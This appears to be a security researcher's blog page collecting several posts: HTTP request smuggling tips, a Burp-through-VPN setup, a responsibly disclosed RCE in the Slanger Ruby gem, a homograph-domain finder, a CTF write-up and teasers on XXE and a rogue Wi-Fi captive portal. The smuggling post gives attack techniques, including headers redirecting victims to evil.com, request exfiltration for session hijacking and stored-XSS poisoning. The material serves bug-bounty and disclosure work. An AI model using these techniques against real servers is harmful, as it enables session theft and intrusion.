HTTP Request Smuggling – 5 Practical Tips

When James Kettle (@albinowax) from PortSwigger published his ground-breaking research on HTTP request smuggling six months ago, I did not immediately delve into the details of it. Instead, I ignored what was clearly a complicated type of attack for a couple of months until, when the time came for me to advise a client on their infrastructure security, I felt I better made sure I understood what all the fuss was about.

Since then, I have been able to leverage the technique in a number of nifty scenarios with varying results. This post focuses on a number of practical considerations and techniques that I have found useful when investigating the impact of the attack against servers and websites that were found to be vulnerable. If you are unfamiliar with HTTP request smuggling, I strongly recommend you read up on the topic in order to better understand what follows below. These are the two absolute must-reads:

Recap

As a recap, there are some key topics that you need to grasp when talking about request smuggling as a technique:

  1. Desynchronization

At the heart of a HTTP request smuggling vulnerability is the fact that two communicating servers are out of sync with each other: upon receiving a HTTP request message with a maliciously crafted payload, one server will interpret the payload as the end of the request and move on to the “next HTTP request” that is embedded in the payload, while the second will interpret it as a single HTTP request, and handle it as such.

  1. Request Poisoning

As a result of a successful desynchronization attack, an attacker can poison the response of the HTTP request that is appended to the malicious payload. For example, by embedding a smuggled HTTP request to a page evil.html, an unsuspecting user might get the response of the evil page, rather than the actual response to a request they sent to the server.

  1. Smuggling result

The result of a successful HTTP smuggling attack will depend heavily on how the server and the client respond to the poisoned request. For example, a successful attack against a static website that hosts a single image file will have a very different impact than successfully targeting a dynamic web application with thousands of concurrent active users. To some extent, you might be able to control the result of your smuggling attack, but in some cases you might be unlucky and need to conclude that the impact of the attack is really next to none.

Practical tips

By and large, I can categorize my experiences with successful request smuggling attacks in two categories: exploiting the application logic, and exploiting server redirects.

When targeting a vulnerable website with a rich web application, it is often possible to exfiltrate sensitive information through the available application features. If any information is stored for you to retrieve at a later point in time (think of a chat, profile description, logs, ….) you might be able to store full HTTP requests in a place where you can later read them.

When leveraging server redirects, on the other hand, you need to consider two things to build a decent POC: a redirect needs to be forced, and it should point to an attacker-controlled server in order to have an impact.

Below are five practical tips that I found useful in determining the impact of a HTTP request smuggling vulnerability.

#1 – Force a redirect

Before even trying to smuggle a malicious payload, it is worth establishing what payload will help you achieve the desired result. To test this, I typically end up sending a number of direct requests to the vulnerable server, to see how it handles edge cases. When you find a requests that results in a server direct (HTTP status code 30X), you can move on to the next step.

Some tests I have started to incorporate in my routine when looking for a redirect are:

  • /aspnet_client on Microsoft IIS will always append a trailing slash and redirect to/aspnet_client/
  • Some other directories that tend to do this are /content, /assets,/images, /styles, …
  • Often http requests will redirect to https
  • I found one example where the path of the referer header was used to redirect back to, i.e. Referer: https://www.company.com//abc.burpcollaborator.net/hacked would redirect to //abc.burpcollaborator.net/hacked
  • Some sites will redirect all files with a certain file extensions, e.g. test.php to test.aspx

#2 – Specify a custom host

When you found a request that results in a redirect, the next step is to determine whether you can force it to redirect to a different server. I have been able to achieve this by trying each of the following:

  • Override the hostname that the server will parse in your smuggled request by including any of the following headers and investigating how the server responds to them:
    • Host: evil.com
    • X-Host: evil.com
    • X-Forwarded-Host: evil.com
  • Similarly, it might work to include the overridden hostname in the first line of the smuggled request: GET http://evil.com/ HTTP/1.1
  • Try illegally formatting the first line of the smuggled request: GET .evil.com HTTP/1.1 will work if the server appends the URI to the existing hostname: Location: https://vulnerable.com.evil.com

#3 – Leak information

Regardless of whether you were able to issue a redirect to an attacker-controlled server, it’s worth investigating the features of the application running on the vulnerable server. This heavily depends on the type of application you are targeting, but a few pointers of things you might look for are:

  • Email features – see if you can define the contents of an email of which receive a copy;
  • Chat features – if you can append a smuggled request, you may end up reading the full HTTP request in your chat window;
  • Update profile (name, description, …) – any field that you can write and read could be useful, as long as it allows special and new-line characters;
  • Convert JSON to a classic POST body – if you want to leverage an application feature, but it communicates via JSON (e.g. {"a":"b", "c":"3"}), see if you can change the encoding to a classic a=b&c=3 format with the header Content-Type: application/x-www-form-urlencoded.

#4 – Perfect your smuggled request

If you are facing issues when launching a smuggling attack, and you don’t see your expected redirect but are facing unexpected error codes (e.g. 400 Bad Request), you may need to put some more information in your smuggled request. Some servers fail when it cannot find expected elements in the HTTP request. Here are some things that sometimes work:

  • Define Content-length and Content-Type headers;
  • Ensure you set Content-Type to application/x-www-form-urlencoded if you are smuggling a POST request;
  • Play with the content length of the smuggled request. In a lot of cases, by increasing or decreasing the smuggled content length, the server will respond differently;
  • Switch GET to POST request, because some servers don’t like GET requests with a non-zero length body.
  • Make sure the server does not receive multiple Host headers, i.e. by pushing the appended request into the POST body of your smuggled request;
  • Sometimes it helps to troubleshoot these kinds of issues if you can find a different page that reflects your poisoned HTTP request, e.g. look for pages that return values in POST bodies, for example an error page with an error message. If you can read the contents of your relayed request, you might figure out why your payload is not accepted by the server;
  • If the server is behind a typical load-balancer like CloudFlare, Akamai or similar, see if you can find its public IP via a service like SecurityTrails and point the HTTP request smuggling attack directly to this “backend”;
  • I have seen cases where the non-encrypted (HTTP) service listening on the server is vulnerable to HTTP request smuggling attacks, whereas the secure channel (HTTPS) service isn’t, and the other way around. Ensure you test both separately and make sure you investigate the impact of both services separately. For example, when HTTP is vulnerable, but all application logic is only served on HTTPS pages, you will have a hard time abusing application logic to demonstrate impact.

#5 – Build a good POC

  • If you are targeting application logic and you can exfiltrate the full HTTP body of arbitrary requests, that basically boils down to a session hijacking attack of arbitrary victims hitting your poisoned requests, because you can view the session cookies in the request headers and are not hindered by browser-side mitigations like the http-only flag in a typical XSS scenario. This is the ideal scenario from an attacker’s point of view;
  • When you found a successful redirect, try poisoning a few requests and monitor your attacker server to see what information is sent to your server. Typically a browser will not include session cookies when redirecting the client to a different domain, but sometimes headless clients are less secure: they may not expect redirects, and might send sensitive information even when redirected to a different server. Make sure to inspect GET parameters, POST bodies and request headers for juicy information;
  • When a redirect is successful, but you are not getting anything sensitive your way, find a page that includes JavaScript files to turn the request poisoning into a stored XSS, ensure your redirect points to a JavaScript payload (e.g. https://xss.honoki.net/), and create a POC that generates a bunch of iframes with the vulnerable page while poisoning the requests, until one of the <script> tags ends up hitting the poisoned request, and redirects to the malicious script;
  • If the target is as static as it gets, and you cannot find a redirect, or there isn’t a page that includes a local JavaScript file, consider holding on to the vulnerability in case you can chain it with a different one instead of reporting it as is. Most bug bounty programs will not accept or reward a HTTP request smuggling vulnerability if you cannot demonstrate a tangible impact.

Finally, keep in mind to act responsibly when testing for HTTP request smuggling, and always consider the impact on production services. When in doubt, reach out to the people running the show to ensure you are not causing any trouble.

How to: Burp ♥ OpenVPN

When performing security tests, you will often be required to send all of your traffic through a VPN. If you don’t want to send all of your local traffic over the same VPN, configuring an easy-to-use setup can sometimes be a pain. This post outlines one possible way of configuring Burp Suite to send all its traffic through a remote VPN, without having to run the VPN on your own machine.

In this guide, I will describe a setup that makes use of the following tools. Note, however, that most of these can be replaced by similar tools to accomplish the same goals.

  • Burp Suite
  • PuTTY
  • OpenVPN running on a Virtual Private Server (VPS)
  • A second VPS as a jumphost (not required if you have a static IP)
  • Browser extension Switchy Omega in Chrome or Firefox

Why?

There are a few reasons why configuring a VPN to execute your security tests may be a good idea:

  1. Testing assets that are not publicly available, e.g. located on an internal network; this is often the case when performing internal infrastructure tests or tests against UAT environments;
  2. Testing public assets from a whitelisted environment, e.g. web applications that are usually hidden behind a WAF, applications that are internet-accessible, but only available to a number of whitelisted networks, etc;
  3. Bug bounty programs that require the use of their VPN as a condition to participate in the program.

To accommodate this need, you may be inclined to install an OpenVPN client on your local testing machine and get going. While this definitely works, I found that separating my testing activities from other network activity is not only a privacy-conscious decision, but also helps towards freeing up as much of the VPN bandwidth as is possible, because now it is no longer occupied with superfluous traffic.

The setup

Architecturally, the solution that I will describe looks like this:

High-level diagram of proxying traffic through a VPN using Burp Suite.

VPN tunnel

The VPN tunnel is of course the core of this setup, and will allow you to tunnel your (selected) traffic either towards assets inside a target’s environment, or towards internet-accessible assets, but originating from the target’s network. In other words, the web applications you are testing will see you coming from Target X’s IP address range, rather than from your own.

Jump host

If you have a static IP on your home or office network, or this is intended as a temporary setup (i.e. your current IP will do), you can skip this.

Otherwise, this jump host will serve as a bridge towards your VPN-connected EC2 instance. Most importantly, the VPS’s static IP will allow us to configure the traffic to and from this jump host to avoid being sent over the VPN.

On this jump host, make sure you have access to the EC2 instance’s private key (if applicable), and set up a SOCKS proxy using the following command:

ssh -i ~/ssh-private-key.pem -D 2222 ubuntu@ec2-hostname.amazonaws.com

This will set up an SSH tunnel that will redirect all traffic proxied through port 2222 on the jump host, towards the original destination via the AWS EC2 instance (i.e. through the VPN when the VPN is activated).

AWS EC2 instance

Because it’s cheap, I opted for a t2.micro instance in AWS EC2 to set up the connection with the VPN. I am a fan of Debian, so I spun up an Ubuntu 18.04 image. Once up and running, you will need the following configured:

  • Install OpenVPN;
  • Upload the ovpn file containing the config of the VPN you want to connect to;
  • Whitelist your jump host (or home/office IP) from the VPN by directing traffic through the usual gateway (source);
  • Whitelist any local DNS servers if needed;
# install OpenVPN client
sudo apt install openvpn

# find out and write down your local gateway's IP address
netstat -anr

# find out and write down your local DNS servers' IP addresses
# (I needed this to allow DNS resolution in AWS EC2 when the VPN is running)
systemd-resolve --status

# Make sure both IPs you wrote down are not redirected through the VPN:
sudo route add -host <your-jumphost-ip> gw <your-local-gateway>
sudo route add -host <your-local-dns-server> gw <your-local-gateway>

# Start the VPN!
sudo openvpn --config ./openvpn-config.ovpn --daemon

Local configuration

The final steps to get this to work are:

  1. Set up local port forwarding to the SOCKS proxy on your jump host;
  2. Configure Burp Suite to use the forwarded local port as a SOCKS proxy;
  3. Use the ProxySwitch browser extension to send only selected sites towards Burp Suite and through the VPN

On Windows, using PuTTY, you can use the following configuration to forward local port 31337 to your jump host on port 2222:

Note that “localhost” in this screenshot is relative to the remote server.

In Burp Suite, go to either User Options or Project Options, and configure SOCKS proxy to point to your localhost on port 31337:

Finally, point your Switchy Omega to your Burp proxy for selected sites:


Before kicking off your tests, I recommend you verify the value of your public IP that is displayed when browsing to a site like ifconfig.co or ipchicken.com with your proxy enabled.

Pros / cons

The described setup has a few (dis)advantages worth mentioning:

Pros

  • Reserve the VPN bandwidth to testing activities only, which can considerably improve your connection speed over a sometimes shaky VPN;
  • Separate your “background” network traffic from the VPN traffic, ensuring your privacy isn’t at risk when testing from your personal device;
  • The AWS EC2 instance can be shut down in-between tests, ensuring your bill doesn’t keep growing overnight;
  • You can configure multiple devices to connect through a single VPN connection by pointing them to the same SOCKS proxy on the jump host.

Cons

  • The setup is slightly more convoluted than just running your OpenVPN client on your local machine;
  • In case of a failing VPN connection on the AWS EC2 instance, you may be executing tests outside of the VPN-ed environment without you noticing;
  • When configuring per-domain proxy settings, web application traffic that hits other domains will not be proxied, possibly leading to unexpected results.

I’d love to hear your thoughts on this! Did you use a similar approach? Do you have suggestions to improve or simplify this setup? Let me know in the comments below.

RCE in Slanger, a Ruby implementation of Pusher

While researching a web application last February, I learned about Slanger, an open source server implementation of Pusher. In this post I describe the discovery of a critical RCE vulnerability in Slanger 0.6.0, and the efforts that followed to responsibly disclose the vulnerability.

SECURITY NOTICE – If you are making use of Slanger in your products, stop reading and get your security fix first! A patch is available on GitHub or as part of the Ruby gem in version 0.6.1.

Pusher vs. Slanger

Pusher is a product that provides a number of libraries to enable the use of WebSockets in a variety of programming languages. WebSockets, according to their website, “represent a standard for bi-directional realtime communication between servers and clients.”

Some of the functionalities offered by Pusher are subscribing and unsubscribing to public and private channels. For example, the following WebSocket request would result in a user subscribing to the channel “presence-example-channel”:

{
  "event": "pusher:subscribe",
  "data": {
    "channel": "presence-example-channel",
    "auth": "<APP_KEY>:<server_generated_signature>",
    "channel_data": "{
      \"user_id\": \"<unique_user_id>\",
      \"user_info\": {
        \"name\": \"Phil Leggetter\",
        \"twitter\": \"@leggetter\",
        \"blogUrl\":\"http://blog.pusher.com\"
      }
    }"
  }
}

While researching a web application, I learned about Slanger, an open-source Ruby implementation that “speaks” the Pusher protocol. In other words, it is a free alternative to Pusher that can be spun up as a stand-alone server in order to accept and process messages like the example above. At the time of writing, the vulnerable library has over 45,000 downloads on Rubygems.org.

I was able to determine what library was being used when the following error message was returned in response to my invalid input:

Request

socket = new WebSocket("wss://push.example.com/app/<app-id>?");
socket.send("test")

Response

{"event":"pusher:error","data":"{\"code\":500,\"message\":\"expected true at line 1, column 2 [parse.c:148]\\n /usr/local/rvm/gems/ruby-2.3.0/gems/slanger-0.6.0/lib/slanger/handler.rb:28:in `load'\\n/usr/local/rvm/gems/ruby-2.3.0/gems/slanger-0.6.0/lib/slanger/handler.rb:28:in `onmessage'\\n/usr/local/rvm/gems/ruby-2.3.0/gems/slanger-0.6.0/lib/slanger/web_socket_server.rb:30:in `block (3 levels) in run'\\n/usr/local/rvm/gems/ruby-2.3.0/gems/em-websocket-0.5.1/lib/em-websocket/connection.rb:18:in `trigger_on_message'\\n/usr/local/rvm/gems/ruby-2.3.0/gems/em-websocket-0.5.1/lib/em-websocket/message_processor_06.rb:52:in `message'\\n/usr/local/rvm/gems/ruby-2.3.0/gems/em-websocket-0.5.1/lib/em-websocket/framing07.rb:118:in `process_data'\\n/usr/local/rvm/gems/ruby-2.3.0/gems/em-websocket-0.5.1/lib/em-websocket/handler.rb:47:in `receive_data'\\n/usr/local/rvm/gems/ruby-2.3.0/gems/em-websocket-0.5.1/lib/em-websocket/connection.rb:76:in `receive_data'\\n/usr/local/rvm/gems/ruby-2.3.0/gems/eventmachine-1.0.9.1/lib/eventmachine.rb:193:in `run_machine'\\n/usr/local/rvm/gems/ruby-2.3.0/gems/eventmachine-1.0.9.1/lib/eventmachine.rb:193:in `run'\\n/usr/local/rvm/gems/ruby-2.3.0/gems/slanger-0.6.0/bin/slanger:106:in `<main>'\"}"}

Note the occurrence of gem slanger-0.6.0, which appears to point to this open source Ruby project on GitHub. Having all the source code at my disposition, my attention was drawn to the file handler.rb that contained the following function responsible for handling incoming WebSocket messages:

def onmessage(msg)
   msg = Oj.load(msg)
   msg['data'] = Oj.load(msg['data']) if msg['data'].is_a? String
   event = msg['event'].gsub(/\Apusher:/, 'pusher_')
   if event =~ /\Aclient-/
      msg['socket_id'] = connection.socket_id
      Channel.send_client_message msg
   elsif respond_to? event, true
      send event, msg
end

Since msg is the string that comes from the user’s end of the two-way communication, that gives us considerable control over this function. In particular, when trying to understand what Oj.load is supposed to do, this code started to look promising — from an attacker’s perspective.

Ruby unmarshalling

As it turns out, Oj (short for “Optimized JSON”) is a “fast JSON parser and Object marshaller as a Ruby gem.” Now that is interesting. From earlier experience, I knew that Ruby marshalling can lead to remote code execution vulnerabilities.

From online documentation, I learned that Oj allows serialization and deserialization of Ruby objects by default. For example, the following string is the result of an object of the class Sample::Doc being serialized with Oj.dump(sample).

{"^o":"Sample::Doc","title":"Sample","user":"ohler","create_time":{"^t":1371361533.272099000},"layers":{},"change_history":[{"^o":"Sample::Change","user":"ohler","time":{"^t":1371361533.272106000},"comment":"Changed at t+0."}],"props":{":purpose":"an example"}}

So presumably, passing a similarly serialized object via socket.send(...) should result in our input being “unmarshalled” by the underlying code in Slanger. All that now stands between an attacker’s input and remote code execution, is the availability of classes and objects that can be manipulated into executing system commands.

Since the Ruby gem appears to have a dependency on the Rails environment, I could build on earlier work by Charlie Somerville to construct a working payload that would lead to remote command execution in two different ways, one of which did not require knowing the app key. See the exploit in action in the video below.

Continue reading on the next page for an account of how I tried to responsibly disclose this bug.

A lot of coffee went into the writing of this article. If it helped you stay secure, please consider buying me a coffee, or invite me to your bug bounty program. 🙂

Buy me a coffeeBuy me a coffee

From blind XXE to root-level file read access

Polyphemus, by Johann Heinrich Wilhelm Tischbein, 1802 (Landesmuseum Oldenburg)

On a recent bug bounty adventure, I came across an XML endpoint that responded interestingly to attempted XXE exploitation. The endpoint was largely undocumented, and the only reference to it that I could find was an early 2016 post from a distraught developer in difficulties.

Below, I will outline the thought process that helped me make sense of what I encountered, and that in the end allowed me to elevate what seemed to be a medium-criticality vulnerability into a critical finding.

I will put deliberate emphasis on the various error messages that I encountered in the hope that it can point others in the right direction in the future.

Note that I have anonymised all endpoints and other identifiable information, as the vulnerability was reported as part of a private disclosure program, and the affected company does not want any information regarding their environment or this finding to be published.

Continue reading

Punicoder – discover domains that are phishing you

So we’re seeing homograph attacks again. Examples show how ‘apple.com’ and ‘epic.com’ can be mimicked by the use of Internationalized Domain Names (IDN) consisting entirely of unicode characters, i.e. xn--80ak6aa92e.com and xn--e1awd7f.com respectively.

As I found myself looking for ways to discover domain names that could be used for phishing attempts, I created a Python script called Punicoder to do the hard work for me. See the screenshot below for example output, and try it out for yourself here.

Punicoder output

Pro tip: use the following series of commands to find out if any of these domains resolve:

pieter@ubuntu:~$ python punicoder.py google.com | cut -d' ' -f2 | nslookup | grep -Pzo '(?s)Name:\s(.*?)Address: (.*?).Server'
Name: xn--oogle-qmc.com
Address: 185.53.178.7
Server
Name: xn--gogl-0nd52e.com
Address: 216.239.32.27
Server
Name: xn--gogl-1nd42e.com
Address: 216.239.32.27
Server
Name: xn--oole-z7bc.com
Address: 50.63.202.59
Server
Name: xn--goole-tmc.com
Address: 75.119.220.238
Server
Name: xn--ggle-55da.com
Address: 216.239.32.27
Server

Hack.lu 2015: Creative Cheating

Write-up of Hack.lu 2015’s Creative Cheating challenge.

The first challenge I solved on Hack.lu 2015, hosted by FluxFingers, was Creative Cheating.

The challenge

Mr. Miller suspects that some of his students are cheating in an automated computer test. He captured some traffic between crypto nerds Alice and Bob. It looks mostly like garbage but maybe you can figure something out. He knows that Alice’s RSA key is (n, e) = (0x53a121a11e36d7a84dde3f5d73cf, 0x10001) (192.168.0.13) and Bob’s is (n, e) = (0x99122e61dc7bede74711185598c7, 0x10001) (192.168.0.37)

The solution

Upon inspection of the packet capture, we notice every packet from Alice (192.168.0.13) to Bob (192.168.0.37) contains a base64-encoded payload. E.g.

U0VRID0gNDsgREFUQSA9IDB4MmMyOTE1MGYxZTMxMWVmMDliYzlmMDY3MzVhY0w7IFNJRyA9IDB4MTY2NWZiMmRhNzYxYzRkZTg5ZjI3YWM4MGNiTDs=

Continue reading

V – For Victor

Victor

In celebration of the birth of my godson Victor in July 2014, I composed a small piece for piano. Click the image above to download the sheet music, and listen to a somewhat messy recording below.

How to set up a Wifi captive portal

Goals

The objective of this Wifi captive portal is to mimic the behaviour of a legitimate access point protected by a portal login page for demonstrational purposes. That includes the following:

  • Broadcast a rogue access point
  • Mimic captive portal behaviour:
    • User gets to see a login page when trying to connect;
    • After logging in, the user can continue to access the network and surf freely.

Continue reading

CSRF Discoverer – A Chrome extension

Continue reading